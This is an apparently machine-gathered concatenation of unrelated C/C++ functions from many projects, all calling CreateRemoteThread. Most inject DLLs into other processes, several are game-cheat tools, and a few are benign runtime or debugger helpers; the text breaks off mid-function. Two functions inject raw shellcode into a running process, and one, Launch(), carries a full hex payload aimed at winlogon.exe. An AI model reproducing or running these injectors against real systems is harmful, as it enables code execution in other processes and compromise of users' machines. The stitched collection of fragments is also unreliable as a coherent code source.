int InjectDLL(char *dll, int ProcessID) {
HANDLE Proc, RemoteThread;
LPVOID RemoteStringPtr, LoadLibAddr;
int writeProcError;
if(!ProcessID) {
return 1;
}
Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
if(!Proc) {
return 2;
}
LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if (LoadLibAddr == NULL) {
return 3;
}
RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
if (RemoteStringPtr == NULL) {
return 4;
}
writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);
if (writeProcError == 0) {
return 5;
}
RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);
if (RemoteThread == NULL) {
return 6;
}
CloseHandle(Proc);
return 0;
}
//-----------------------------------------------------------------------------
// Name: Execute
// Object: execute RemoteProcFuncAddress proc in remote process (blocking call : function will not return until thread as finished)
// Use this function if you don't have injected code (func already exist in remote process)
// WARNING A DIRECT CALL WILL WORK ONLY FOR FUNC HAVING 1 PARAMETER AND IF THIS PARAMETER IS A POINTER
// else you have to do code injection like done in RemoteGetProcAddress, RemoteGetModuleHandleThreadProc
// RemoteFreeLibrary
// Parameters :
// in : FARPROC RemoteProcFunc : remote address of the proc func to execute
// out : LPDWORD lpExitCode : exit code of TreadProc
// return : FALSE on error
//-----------------------------------------------------------------------------
BOOL CCodeInject::Execute(FARPROC RemoteProcFuncAddress,LPDWORD lpExitCode)
{
HANDLE hThread = NULL; // the handle to the thread executing the remote copy of ThreadProc;
DWORD dwThreadId = 0;
if (IsBadWritePtr(lpExitCode,sizeof(DWORD)))
return FALSE;
*lpExitCode=0;
// Start execution of remote ThreadProc
hThread = CreateRemoteThread(this->hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE) RemoteProcFuncAddress,
this->pDataRemote,
0,
&dwThreadId
);
if (!hThread)
return FALSE;
// wait for end of thread
if (WaitForSingleObject(hThread, INFINITE)!=WAIT_OBJECT_0)
{
CloseHandle(hThread);
return FALSE;
}
GetExitCodeThread(hThread, lpExitCode);
CloseHandle(hThread);
return TRUE;
}
// TODO: comment.
BOOL RemoteSynchronousCall(HANDLE process, LPVOID function, LPVOID argument, LPDWORD result) {
LPTHREAD_START_ROUTINE routine = static_cast<LPTHREAD_START_ROUTINE>(static_cast<LPVOID>(function));
ScopedHandle thread(CreateRemoteThread(process, NULL, 0, routine, argument, 0, NULL));
if(thread.handle == NULL) {
THROW_ERROR("Unable to create a thread in the remote process!");
return FALSE;
}
DWORD event = WaitForSingleObject(thread.handle, INFINITE);
if(event != WAIT_OBJECT_0) {
THROW_ERROR("Unable to wait for the thread to finish!");
return FALSE;
}
DWORD exit_code;
BOOL rv = GetExitCodeThread(thread.handle, &exit_code);
if(rv == FALSE) {
THROW_ERROR("Unable to get remote thread's exit code!");
return FALSE;
}
if(!thread.Close()) {
THROW_ERROR("Unable to close remote thread!");
return FALSE;
}
*result = exit_code;
return TRUE;
}
int main() {
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi));
CreateProcessW(PROC_NAME, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
LPTHREAD_START_ROUTINE pLoadLibraryW =
(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
SIZE_T dwLength = (wcslen(DLL_NAME) + 1) * 2;
LPVOID lpLibName = VirtualAllocEx(pi.hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);
SIZE_T written = 0;
WriteProcessMemory(pi.hProcess, lpLibName, DLL_NAME, dwLength, &written);
HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, NULL, pLoadLibraryW, lpLibName, NULL, NULL);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
ResumeThread(pi.hThread);
VirtualFreeEx(pi.hProcess, lpLibName, dwLength, MEM_RELEASE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
bool LoadRemoteDll(DWORD pid, const char* dllPath)
{
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProc == NULL)
return false;
PVOID p = VirtualAllocEx(hProc, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
DWORD l;
BOOL r = WriteProcessMemory(hProc, p, dllPath, strlen(dllPath) + 1, &l);
if (!r) {
VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);
return false;
}
HANDLE hThread = CreateRemoteThread(hProc, NULL, 0,
(LPTHREAD_START_ROUTINE )GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA"),
p, 0, &l);
VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);
if (hThread == NULL) {
return false;
}
WaitForSingleObject(hThread, INFINITE);
GetExitCodeThread(hThread, &l);
CloseHandle(hThread);
return l != 0;
}
/*
Unload Dll from process
RETURN:
Error code
*/
DWORD CMemDll::Unload()
{
HANDLE hThread = NULL;
HMODULE hDll = NULL;
if(!CMemCore::Instance().m_hProcess)
return ERROR_INVALID_HANDLE;
//Search for dll in process
if((hDll = (HMODULE)GetModuleAddress(GetProcessId(CMemCore::Instance().m_hProcess), TEXT(DLL_NAME))) !=0 )
{
hThread = CreateRemoteThread
(
CMemCore::Instance().m_hProcess,
NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "FreeLibrary"),
(void*)hDll,
0, NULL
);
if(hThread == NULL)
{
MessageBox(NULL, TEXT("Cannot create thread"), TEXT("Error"), MB_ICONERROR);
return GetLastError();
}
//Wait for completion
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
return ERROR_SUCCESS;
}
NTSTATUS
NTAPI
BaseCreateThreadPoolThread(IN PTHREAD_START_ROUTINE Function,
IN PVOID Parameter,
OUT PHANDLE ThreadHandle)
{
NTSTATUS Status;
/* Create a Win32 thread */
*ThreadHandle = CreateRemoteThread(NtCurrentProcess(),
NULL,
0,
Function,
Parameter,
CREATE_SUSPENDED,
NULL);
if (!(*ThreadHandle))
{
/* Get the status value if we couldn't get a handle */
Status = NtCurrentTeb()->LastStatusValue;
if (NT_SUCCESS(Status)) Status = STATUS_UNSUCCESSFUL;
}
else
{
/* Set success code */
Status = STATUS_SUCCESS;
}
/* All done */
return Status;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
int nArgs;
LPWSTR* lpszArgs = CommandLineToArgvW(GetCommandLineW(), &nArgs);
int showHelp = (nArgs < 2);
int showAttachNotification = 0;
LPWSTR lpszTargetCmd = NULL;
int posArg = 0;
while (++posArg < nArgs) {
if (!wcscmp(lpszArgs[posArg], L"/?")) {
showHelp = 1;
break;
} else if (!wcscmp(lpszArgs[posArg], L"/M")) {
showAttachNotification = 1;
} else {
size_t cbTargetArgs = strlen(lpCmdLine) * sizeof(wchar_t);
lpszTargetCmd = (wchar_t*) malloc(cbTargetArgs);
memset(lpszTargetCmd, 0, cbTargetArgs);
wchar_t* lpszTargetTemp = lpszTargetCmd;
size_t nArgLength = 0;
for (int i = posArg; i < nArgs; i++) {
nArgLength = wcslen(lpszArgs[i]);
wcscpy(lpszTargetTemp, lpszArgs[i]);
if (posArg < nArgs-1) {
lpszTargetTemp += wcslen(lpszArgs[i]);
wcscpy(lpszTargetTemp, L" ");
lpszTargetTemp++;
}
}
break;
}
}
if (showHelp) {
MessageBox(0, L"ReLocale by kolpazar\n\nUsage: ReLocale [opts] exe [args]\n\nOpts:\n/M Display a message after hooking\n/? Display this window", L"ReLocale", MB_OK);
return 0;
}
if (showAttachNotification) {
SetEnvironmentVariable(k_lpAttachNotification, L"1");
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
CreateProcess(NULL, lpszTargetCmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED, FALSE, NULL, &si, &pi);
char szHookLibrary[MAX_PATH];
#ifndef _M_AMD64
strcpy((char*) &szHookLibrary, "ReLocaleHook.dll");
#else
strcpy((char*) &szHookLibrary, "ReLocaleHook64.dll");
#endif
LPVOID lpProcessMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(szHookLibrary), MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(pi.hProcess, lpProcessMem, &szHookLibrary, sizeof(szHookLibrary), NULL);
HANDLE hDllThread = CreateRemoteThread(pi.hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), lpProcessMem, 0, NULL);
WaitForSingleObject(hDllThread, INFINITE);
ResumeThread(pi.hThread);
return 0;
}
VOID InjectCreateProcess(PCHAR pName, PCHAR pDllName, PCHAR pCmdArg)
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ULONG_PTR dwAddr;
HANDLE hThread;
HMODULE hKernel32;
CHAR CurrentPath[MAX_PATH ];
if (!GetCurrentDirectory(sizeof(CurrentPath) - 1, CurrentPath)) {
printf("[-] InjectCreateProcess - GetCurrentDirectory failed : %lu\n", GetLastError());
return;
}
hKernel32 = GetModuleHandleA("kernel32.dll");
memset(&si, 0, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
if (!CreateProcessA(pName, pCmdArg, NULL, NULL, FALSE, CREATE_SUSPENDED, GetEnvironmentStrings(), CurrentPath, &si, &pi)) {
printf("[-] InjectCreateProcess - CreateProcessA() failed : %lu\n", GetLastError());
exit(EXIT_FAILURE);
}
dwAddr = (ULONG_PTR)VirtualAllocEx(pi.hProcess, 0, strlen(pDllName) + 1, MEM_COMMIT, PAGE_READWRITE);
if ((LPVOID)dwAddr == NULL) {
printf("[-] InjectCreateProcess - VirtualAllocEx failed() : %lu\n", GetLastError());
TerminateProcess(pi.hProcess, 42);
exit(EXIT_FAILURE);
}
WriteProcessMemory(pi.hProcess, (LPVOID)dwAddr, (void*)pDllName, strlen(pDllName) + 1, NULL);
hThread = CreateRemoteThread(pi.hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE) GetProcAddress(hKernel32,"LoadLibraryA"),
(LPVOID)dwAddr, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
ResumeThread(pi.hThread);
CloseHandle(hThread);
}
bool CUtils::InjectLibraryIntoProcess(HANDLE hProcess, char * szLibPath)
{
bool bReturn = true;
size_t sLibraryPathLen = (strlen(szLibPath) + 1);
void * pRemoteLibraryPath = VirtualAllocEx(hProcess, NULL, sLibraryPathLen, MEM_COMMIT, PAGE_READWRITE);
SIZE_T sBytesWritten = 0;
WriteProcessMemory(hProcess, pRemoteLibraryPath, (void *)szLibPath, sLibraryPathLen, &sBytesWritten);
if(sBytesWritten != sLibraryPathLen)
{
bReturn = false;
} else {
HMODULE hKernel32 = GetModuleHandle("Kernel32");
FARPROC pfnLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnLoadLibraryA, pRemoteLibraryPath, 0, NULL);
if(hThread)
{
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
} else {
bReturn = false;
}
}
VirtualFreeEx(hProcess, pRemoteLibraryPath, sizeof(pRemoteLibraryPath), MEM_RELEASE);
return bReturn;
}
int InjectDLL(HANDLE hProcess, TCHAR *szDllPath)
{
int szDllPathLen = lstrlen(szDllPath) + 1;
PWSTR RemoteProcessMemory = (PWSTR)VirtualAllocEx(hProcess,
NULL, szDllPathLen, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
if(RemoteProcessMemory == NULL)
return -1;
BOOL bRet = WriteProcessMemory(hProcess,
RemoteProcessMemory, (PVOID)szDllPath, szDllPathLen, NULL);
if(bRet == FALSE)
return -1;
PTHREAD_START_ROUTINE pfnThreadRtn;
pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle("kernel32"), "LoadLibraryA");
if(pfnThreadRtn == NULL)
return -1;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
pfnThreadRtn, RemoteProcessMemory, 0, NULL);
if(hThread == NULL)
return -1;
WaitForSingleObject(hThread, INFINITE);
VirtualFreeEx(hProcess,
RemoteProcessMemory, szDllPathLen, MEM_RELEASE);
CloseHandle(hThread);
return 0;
}
bool injectDLL(HANDLE process, const wchar_t* dllName)
{
LPVOID loadLibAddress = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryW");
LPVOID nameAddress = loadStringToMemory(process, dllName);
if (!nameAddress || !loadLibAddress)
return false;
HANDLE creationThread = CreateRemoteThread(process, NULL, NULL,
static_cast<LPTHREAD_START_ROUTINE>(loadLibAddress),
nameAddress, NULL, NULL);
if (creationThread)
{
WaitForSingleObject(creationThread, INFINITE);
DWORD ret;
GetExitCodeThread(creationThread, &ret);
CloseHandle(creationThread);
return (ret != NULL);
}
else
return false;
}
void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;
phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}
shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); CloseHandle(phd); return ;
}
WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");
h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}
else
printf("shellcode Execution Successfull");
}
bool DebugFrontend::ExecuteRemoteKernelFuntion(HANDLE process, const char* functionName, LPVOID param, DWORD& exitCode)
{
HMODULE kernelModule = GetModuleHandle("Kernel32");
FARPROC function = GetProcAddress(kernelModule, functionName);
if (function == NULL)
{
return false;
}
DWORD threadId;
HANDLE thread = CreateRemoteThread(process, NULL, 0,
(LPTHREAD_START_ROUTINE)function, param, 0, &threadId);
if (thread != NULL)
{
WaitForSingleObject(thread, INFINITE);
GetExitCodeThread(thread, &exitCode);
CloseHandle(thread);
return true;
}
else
{
return false;
}
}
void Launch()
{
void* pMem;
char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x00";
wchar_t* str = L"winlogon.exe";
DWORD PID = getProcessId(str);
HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
HANDLE hProcess, hThread;
LPVOID pRemoteBuf;
DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);
LPTHREAD_START_ROUTINE pThreadProc;
if ( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) )
{
printf("OpenProcess(%d) failed!!!\n", dwPID);
return FALSE;
}
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,
MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuf,
(LPVOID)szDllPath, dwBufSize, NULL);
pThreadProc = (LPTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(L"kernel32.dll"),
"LoadLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0,
pThreadProc, pRemoteBuf, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
/***********************************************************************
* CreateThread (KERNEL32.@)
*/
HANDLE WINAPI CreateThread( SECURITY_ATTRIBUTES *sa, SIZE_T stack,
LPTHREAD_START_ROUTINE start, LPVOID param,
DWORD flags, LPDWORD id )
{
return CreateRemoteThread( GetCurrentProcess(),
sa, stack, start, param, flags, id );
}
int main() {
HANDLE proc = 0;
HANDLE procThread = 0;
bool notified = false;
while (proc == 0) {
proc = GetProcessByName(PROC_NAME);
if (proc == 0) {
if (!notified) {
printf("proc doesn't exist, waiting... gle=%x\n", GetLastError());
notified = true;
}
Sleep(1);
}
}
void *paramAddr = VirtualAllocEx(proc, 0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
SIZE_T bytesWritten = 0;
char dllPath[MAX_PATH];
int len = GetCurrentDirectory(MAX_PATH, dllPath);
strcpy(dllPath + len, "\\" DLL_NAME);
WriteProcessMemory(proc, paramAddr, dllPath, 0x100, &bytesWritten);
HANDLE thread = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)paramAddr, 0, 0);
if (procThread) {
ResumeThread(procThread);
}
}
BOOL CCollisionMap::RemoveRoomData(DWORD LevelNo, DWORD x, DWORD y)
{
BYTE AsmStub[] = {
0x68, 00,00,00,00, // Pushing the pAct to the Stack
0x68, 00,00,00,00, // Pushing the LevelId to the Stack
0x68, 00,00,00,00, // Pushing the xPos to the Stack
0x68, 00,00,00,00, // Pushing the yPos to the Stack
0x68, 00,00,00,00, // Pushing the pRoom to the Stack
0xB8, 00,00,00,00, // MOV EAX, 0x00
0xFF, 0xD0, // Call Eax
0xC3,
};
*(DWORD*)&AsmStub[1] = PlayerInfo.dwRoomAddr;
*(DWORD*)&AsmStub[6] = y;
*(DWORD*)&AsmStub[11] = x;
*(DWORD*)&AsmStub[16] = LevelNo;
*(DWORD*)&AsmStub[21] = PlayerInfo.dwActAddr;
*(DWORD*)&AsmStub[26] = CCollisionMap::DLLInfo.D2Common + 0x56830;
LPVOID Address = VirtualAllocEx(Memory.WindowHandle, NULL, sizeof(AsmStub), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Memory.WriteMemory((DWORD)Address,AsmStub,sizeof(AsmStub));
HANDLE pHandle = CreateRemoteThread(Memory.WindowHandle,NULL,sizeof(DWORD),(LPTHREAD_START_ROUTINE)Address,NULL,NULL,NULL);
WaitForSingleObject(pHandle,INFINITE);
CloseHandle(pHandle);
VirtualFreeEx(Memory.WindowHandle,(LPVOID)Address,sizeof(AsmStub),MEM_RELEASE);
return TRUE;
}
static void inject(int pid, const std::string & path)
{
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
std::cout << "OpenProcess() return 0x" << std::hex << process << std::endl;
if (process)
{
int n = path.size() + 1;
LPVOID ptr = VirtualAllocEx(process, NULL, n, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (ptr)
{
DWORD m = 0;
WriteProcessMemory(process, ptr, path.c_str(), n, &m);
if (m == n)
{
LPTHREAD_START_ROUTINE loadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
if (loadLibrary)
{
DWORD tid = 0;
HANDLE thread = CreateRemoteThread(process, NULL, 0, loadLibrary, ptr, 0, &tid);
if (thread != NULL)
{
::WaitForSingleObject(thread, INFINITE);
DWORD exitCode = 0;
::GetExitCodeThread(thread, &exitCode);
}
}
}
}
}
}
void Inject(HANDLE process, LPCSTR modulePath)
{
if(!FileExists(modulePath))
{
MessageBox(0, modulePath, "File Not Found", 0);
return;
}
LPVOID address = nullptr;
BOOL success = FALSE;
HMODULE kernel32 = nullptr;
HANDLE thread = nullptr;
__try
{
// Inject the dll path into the target process
address = VirtualAllocEx(process, NULL, strlen(modulePath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("Address allocated : %X\n", address);
success = WriteProcessMemory(process, (LPVOID)address, modulePath, strlen(modulePath), NULL);
printf("WriteProcessMemory : %s\n", success? "successed":"failed");
// Invoke LoadLibrary via CreateRemoteThread
kernel32 = GetModuleHandle("kernel32.dll");
printf("Kernel32 : %X\n", kernel32);
thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryA"), (LPVOID)address, 0, NULL);
printf("Remote thread handle : %X\n", thread);
}
__finally
{
if(thread) CloseHandle(thread);
if(kernel32) FreeLibrary(kernel32);
if(address) VirtualFreeEx(process, NULL, (size_t)strlen(modulePath), MEM_RESERVE|MEM_COMMIT);
}
}
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath) {
HANDLE hProcess =NULL, hThread = NULL;
HMODULE hMod = NULL;
LPVOID pRemoteBuf = NULL;
DWORD dwBufSize = (DWORD)(_tcslen(szDllPath)+1)*sizeof(TCHAR);
LPTHREAD_START_ROUTINE pThreadProc;
// #1 使用dwPID获取目标进程句柄。
if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID))) {
_tprintf(L"OpenProcess(%d) failed![%d]\n",dwPID,GetLastError());
return FALSE;
}
// #2 在目标进程的内存中分配dwBufSize大小的内存空间
pRemoteBuf = VirtualAllocEx(hProcess,NULL,dwBufSize,MEM_COMMIT,PAGE_READWRITE);
// #3 将要注入的dll路径写入分配的内存。
WriteProcessMemory(hProcess,pRemoteBuf,(LPVOID)szDllPath,dwBufSize,NULL);
// #4 获取LoadLibraryW 的API地址
hMod = GetModuleHandle(L"kernel32.dll");
pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod,"LoadLibraryW");
// #5 在目标进程中运行线程
hThread = CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteBuf,0,NULL);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
static BOOL
SafeTerminateProcess(HANDLE hProcess, UINT uExitCode)
{
DWORD dwTID, dwCode, dwErr = 0;
HANDLE hProcessDup = INVALID_HANDLE_VALUE;
HANDLE hRT = NULL;
HINSTANCE hKernel = GetModuleHandle("Kernel32");
BOOL bSuccess = FALSE;
BOOL bDup = DuplicateHandle(GetCurrentProcess(), hProcess, GetCurrentProcess(), &hProcessDup, PROCESS_ALL_ACCESS, FALSE, 0);
if (GetExitCodeProcess((bDup) ? hProcessDup : hProcess, &dwCode) && (dwCode == STILL_ACTIVE)) {
FARPROC pfnExitProc;
pfnExitProc = GetProcAddress(hKernel, "ExitProcess");
hRT = CreateRemoteThread((bDup) ? hProcessDup : hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnExitProc, (PVOID)uExitCode, 0, &dwTID);
if (hRT == NULL)
dwErr = GetLastError();
} else {
dwErr = ERROR_PROCESS_ABORTED;
}
if (hRT) {
WaitForSingleObject((bDup) ? hProcessDup : hProcess, INFINITE);
CloseHandle(hRT);
bSuccess = TRUE;
}
if (bDup)
CloseHandle(hProcessDup);
if (!bSuccess)
SetLastError(dwErr);
return bSuccess;
}
/// <summary>
/// Creates new thread in the remote process
/// </summary>
/// <param name="hThread">Created thread handle</param>
/// <param name="entry">Thread entry point</param>
/// <param name="arg">Thread argument</param>
/// <param name="flags">Creation flags</param>
/// <param name="access">Access override</param>
/// <returns>Status code</returns>
NTSTATUS Native::CreateRemoteThreadT( HANDLE& hThread, ptr_t entry, ptr_t arg, CreateThreadFlags flags, DWORD access /*= THREAD_ALL_ACCESS*/ )
{
SetLastNtStatus( STATUS_SUCCESS );
NTSTATUS status = 0;
auto pCreateThread = GET_IMPORT( NtCreateThreadEx );
if (pCreateThread)
{
status = pCreateThread(
&hThread, access, NULL,
_hProcess, reinterpret_cast<PTHREAD_START_ROUTINE>(entry),
reinterpret_cast<LPVOID>(arg), static_cast<DWORD>(flags),
0, 0x1000, 0x100000, NULL
);
if (!NT_SUCCESS( status ))
hThread = NULL;
}
else
{
DWORD win32Flags = 0;
if (flags & CreateSuspended)
win32Flags = CREATE_SUSPENDED;
hThread = CreateRemoteThread(
_hProcess, NULL, 0, reinterpret_cast<PTHREAD_START_ROUTINE>(entry),
reinterpret_cast<LPVOID>(arg), win32Flags, NULL
);
status = LastNtStatus();
}
return status;
}
BOOL InjectDll2(HANDLE hProcess, LPCTSTR szDllName)
{
HANDLE hThread;
LPVOID pRemoteBuf;
DWORD dwBufSize = (DWORD)(_tcslen(szDllName) + 1) * sizeof(TCHAR);
FARPROC pThreadProc;
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,
MEM_COMMIT, PAGE_READWRITE);
if( pRemoteBuf == NULL )
return FALSE;
WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllName,
dwBufSize, NULL);
pThreadProc = GetProcAddress(GetModuleHandleA("kernel32.dll"),
"LoadLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pThreadProc,
pRemoteBuf, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
CloseHandle(hThread);
return TRUE;
}
int wmain(int argc, wchar_t *argv[], wchar_t *envp[])
{
HANDLE proc = 0;
HANDLE procThread = 0;
bool notified = false;
while (proc == 0)
{
proc = GetProcessByName(PROC_NAME);
if (proc == 0)
{
if (!notified)
{
printf("Waiting for RobotArena3.exe to start... gle=%x\n", GetLastError());
notified = true;
}
Sleep(1);
}
}
void *paramAddr = VirtualAllocEx(proc, 0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
SIZE_T bytesWritten = 0;
wchar_t dllPath[MAX_PATH];
int len = GetCurrentDirectory(MAX_PATH, dllPath);
wcscpy(dllPath + len, L"\\" DLL_NAME);
WriteProcessMemory(proc, paramAddr, dllPath, 0x100, &bytesWritten);
HANDLE thread = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibrary, (LPVOID)paramAddr, 0, 0);
if (procThread)
{
ResumeThread(procThread);
}
}
BOOL CFileControlTool::CloseRemoteProcessHandle(DWORD dwProcessID,HANDLE hRemoteHandle)
{
BOOL result = FALSE;
HANDLE hRemoteThread = NULL;
HMODULE hKernel32Module = NULL;
HANDLE hTargetProcess = NULL;
hTargetProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE|PROCESS_VM_READ,FALSE,dwProcessID);
hKernel32Module = LoadLibrary(_T("kernel32.dll"));
if(hTargetProcess && hKernel32Module){
hRemoteThread = CreateRemoteThread(hTargetProcess,0,0,(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32Module,"CloseHandle"),hRemoteHandle,0,NULL);
if(hRemoteThread == NULL){
result = FALSE;
goto Error;
}
if(WaitForSingleObject(hRemoteThread,2000) == WAIT_OBJECT_0){
result = TRUE;
}else{
result = FALSE;
}
}
Error:
if(hRemoteThread){
CloseHandle(hRemoteThread);
}
if(hTargetProcess){
CloseHandle(hTargetProcess);
}
if(hKernel32Module){
FreeLibrary(hKernel32Module);
}
return result;
}
void injectIntoProcess(int processId, char *dllInput)
{
printf(" [WARN] inject mode, this is inherently risky\n");
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,processId);
if (hProcess == NULL)
{
printf(" [FAIL] could not open process %04x\n",processId);
return;
}
globalPid = processId;
printf(" [INFO] injected into process %d\n",processId);
SIZE_T bW = 0, bR = 0;
printf(" [INFO] attempting to create data cave\n");
LPVOID remoteMemory = VirtualAllocEx(hProcess,NULL,strlen(dllInput) + 1,MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE);
WriteProcessMemory(hProcess,(LPVOID )remoteMemory,dllInput,strlen(dllInput) + 1,&bW);
HANDLE hKernel = LoadLibrary("kernel32.dll");
LPVOID addrLoadLibrary = GetProcAddress( (HMODULE )hKernel, "LoadLibraryA");
